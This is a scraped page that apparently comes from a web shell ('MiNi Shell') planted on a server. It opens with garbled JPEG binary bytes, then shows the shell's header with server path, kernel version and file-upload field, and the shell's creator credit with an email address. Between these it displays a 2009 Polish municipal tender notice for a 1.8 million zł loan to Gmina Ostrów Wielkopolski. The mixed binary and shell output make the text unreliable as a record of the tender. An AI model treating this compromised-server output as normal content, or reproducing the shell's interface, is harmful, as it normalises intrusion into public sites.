JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091013/177015-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Udzielenie kredytu długoterminowego w kwocie 1.800.000,00 zł (słownie: jeden milion osiemset tysięcy zł) z przeznaczeniem na sfinansowanie wydatków nie znajdujących pokrycia w planowanych dochodach Gminy na 2009r.</b><br>
<b>Numer ogłoszenia: 177015 - 2009; data zamieszczenia: 13.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrów Wielkopolski , Aleje Powstańców Wielkopolskich 12, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062/7351190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowwielkopolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego w kwocie 1.800.000,00 zł (słownie: jeden milion osiemset tysięcy zł) z przeznaczeniem na sfinansowanie wydatków nie znajdujących pokrycia w planowanych dochodach Gminy na 2009r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa udzielenia kredytu długoterminowego w kwocie 1.800.000,00 zł

Usługi.


2.	Zamówienie polega na udzieleniu i obsłudze złotówkowego kredytu długoterminowego w kwocie 1.800.000,00 zł (słownie: jeden milion osiemset tysięcy zł) dla Gminy Ostrów Wielkopolski. 

3.	Po podpisaniu umowy kredyt uruchamiany będzie na podstawie pisemnych dyspozycji Zamawiającego w zależności od potrzeb. 
Określenie wysokości transz kredytu oraz termin postawienia ich do dyspozycji Zamawiającego następować będzie poprzez złożenie przez Zamawiającego zapotrzebowania na środki (wzór zapotrzebowania stanowić będzie załącznik do umowy kredytowej, przy czym zwycięski (wybrany) Wykonawca przed podpisaniem umowy jest obowiązany przedłożyć Zamawiającemu do uzgodnienia i zaakceptowania wzór takiego zapotrzebowania) w terminie 3 dni przed postawieniem raty transzy do dyspozycji. 

4.	Zamawiający zastrzega sobie możliwość niewykorzystania całej kwoty kredytu bez  ponoszenia z tego tytułu jakichkolwiek kosztów i bez wymaganej zgody Wykonawcy oraz konieczności sporządzania aneksu. 

5.	Spłata kapitału następować będzie w okresach kwartalnych według następującego   harmonogramu, terminy kwartalne:

a) w 2010 roku 	III kwartał 30 września	kwota 100.000,00 zł,
			IV kwartał 31 grudnia	kwota 100.000,00 zł,

b) w 2011 roku	I kwartał 31 marca 		kwota 100.000,00 zł,
			II kwartał 30 czerwca		kwota 100.000,00 zł,
			III kwartał 30 września	kwota 100.000,00 zł,
			IV kwartał 31 grudnia	kwota 100.000,00 zł,

c) w 2012 roku	I kwartał 31 marca		kwota 100.000,00 zł,
			II kwartał 30 czerwca		kwota 100.000,00 zł,
			III kwartał 30 września	kwota 100.000,00 zł,
			IV kwartał 31 grudnia	kwota 100.000,00 zł,

d) w 2013 roku	I kwartał 31 marca		kwota 100.000,00 zł,
			II kwartał 30 czerwca		kwota 100.000,00 zł,
			III kwartał 30 września	kwota 100.000,00 zł,
			IV kwartał 31 grudnia	kwota 100.000,00 zł,

e) w 2014 roku	I kwartał 31 marca		kwota 100.000,00 zł,
			II kwartał 30 czerwca		kwota 100.000,00 zł,
			III kwartał 30 września	kwota 100.000,00 zł,
			IV kwartał 31 grudnia	kwota 100.000,00 zł.

6.	W szczególnie uzasadnionych przypadkach na wniosek Zamawiającego dopuszcza się 
możliwość - za zgodą Wykonawcy - przesunięcie terminu spłaty raty kredytu. 
     Powyższy wniosek powinien być przedłożony przez Zamawiającego nie później niż na 
  3 dni przed terminem płatności raty kredytu, za wyjątkiem terminu ostatniego kwartału  
  2014r.

7.	Karencja w spłacie kapitału do dnia 29 września 2010 roku. 

8.	Spłata kredytu wraz z odsetkami nastąpi z dochodów własnych gminy. Zabezpieczeniem 
kredytu będzie weksel in blanco z deklaracją wekslową z wystawienia Zamawiającego
z klauzulą - bez protestu. 

9.	Spłata odsetek od wykorzystanego kredytu następować będzie w okresach  miesięcznych do ostatniego dnia roboczego każdego miesiąca w latach 2009-2014. 

10.	Ostatnia rata odsetek jest płatna w terminie płatności ostatniej raty kredytu. 

11.	Przy naliczaniu oprocentowania za dany miesiąc przyjmuje się rzeczywistą liczbę dni 
miesiącu, a rok 365 dni. 

12.	Oprocentowanie kredytu zmienne w okresie kredytowania liczone w stosunku do stopy 
procentowej WIBOR 1M jako średnia arytmetyczna w miesiącu poprzedzającym dzień 
uruchomienia kredytu lub naliczenia odsetek - cześć zmienna, powiększona o stałą 
w okresie kredytowania marżę banku. 

13.	O wysokości oprocentowania w każdym kolejnym okresie odsetkowym Wykonawca 
będzie informował Zamawiającego na piśmie. 

14.	Strony ustalają, że element cenotwórczy tzw. marża banku Mb poza bazą oprocentowania 
określoną stawką WIBOR będzie wielkością stałą na czas obowiązywania umowy i nie 
będzie mogła podlegać żadnym zmianom. 

15.	Termin realizacji zamówienia: do 30 grudnia 2014r.
Termin podpisania umowy uzależniony jest od daty rozstrzygnięcia procedury 
przetargowej. Przewidywany termin podpisania umowy: listopad 2009r. 

16.	Okres kredytowania w terminie min. 3 dni od daty zawarcia umowy do 30 grudnia 2014 r. 
z możliwością wcześniejszej spłaty zadłużenia bez ponoszenia przez Zamawiającego 
dodatkowych opłat z tytułu skrócenia okresu kredytowania, jak również bez wpływu na 
warunki umowy. 

17.	Zamawiający zastrzega sobie możliwość wcześniejszej spłaty kredytu bez ponoszenia 
z tego tytułu dodatkowych kosztów, po uprzednim, z wyprzedzeniem co najmniej 
1-miesięcznym, poinformowaniem o tym Wykonawcy tj. banku. 

18.	Kredyt udzielany jest w walucie polskiej. 

19.	Integralną częścią opisu przedmiotu zamówienia są obowiązki Wykonawcy wynikające 
z projektu umowy - załącznik nr 3 do SIWZ oraz Informacja o Zamawiającym stanowiąca Załącznik nr 4 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12000.00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art.22 ust.1 ustawy Pzp.

1.	Oświadczają, że spełniają warunki udziału określone w art.22 ust.1 Prawo zamówień 
publicznych oraz, że nie podlegają wykluczeniu z postępowania na podstawie art.24 Pzp.

2.	Sprawdzenie spełnienia w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.
 
3.	Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie 
nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału 
w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia 
w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega 
odrzuceniu lub konieczne byłoby unieważnienie postępowania. 


Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
	Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1ust.1 
	Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. 
1)	pkt.2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b.	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono 
wobec niego zakazu ubiegania się o zamówienie, 
c.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2)	pkt.4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego 
		kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie 
     określonym w art.24 ust.1 pkt.4 - 8 ustawy.

2.	Dokumenty, o których mowa w ust.1 pkt.1 lit.a i c oraz pkt.2, powinny być wystawione 
      nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
      o opuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
	Dokument, o którym mowa w ust.1 pkt.1 lit.b, powinien być wystawiony nie wcześniej 
      niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie 
	do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

3. 	Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę 
	lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.1, 
	zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, 	właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego 
	lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
	wykonawca ma siedzibę lub miejsce zamieszkania. 
	Przepis ust. 2 stosuje się odpowiednio..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 - Wykonawca składa oświadczenia, których wzór stanowi Załącznik Nr 2 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:
-	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 	do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy 	przed upływem terminu składania ofert. 

2.	Aktualne zezwolenie na utworzenie i rozpoczęcie przez bank działalności wynikające z ustawy z dnia 29.08.1997r. - Prawo bankowe (Dz. U. z 2002r. Nr 72, poz. 665 z późn. zm.) po 1 stycznia 1998r. (zezwolenie uprawniające do wykonywania czynności bankowych).   

3.	Inne wymagane dokumenty:
1)	formularz oferty - Załącznik nr 1;
2)	Oświadczenie Wykonawcy - art.22 ust.1 pkt.1-4 ustawy Prawo zamówień publicznych - Załącznik nr 2;
3)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę o ile 	uprawnienia te nie wynikają z przepisów prawa lub innych dokumentów 	rejestrowych;
4)	projekt umowy zaakceptowany przez wykonawcę - Załącznik nr 3..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ostrowwielkopolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ostrów Wielkopolski Al. Powstańców  Wielkopolskich 12, pokój nr 3 lub za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 08:30, miejsce: Ofertę należy złożyć Zamawiającemu, Urząd Gminy Ostrów Wielkopolski Al. Powstańców  Wielkopolskich 12, pokój nr 2..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com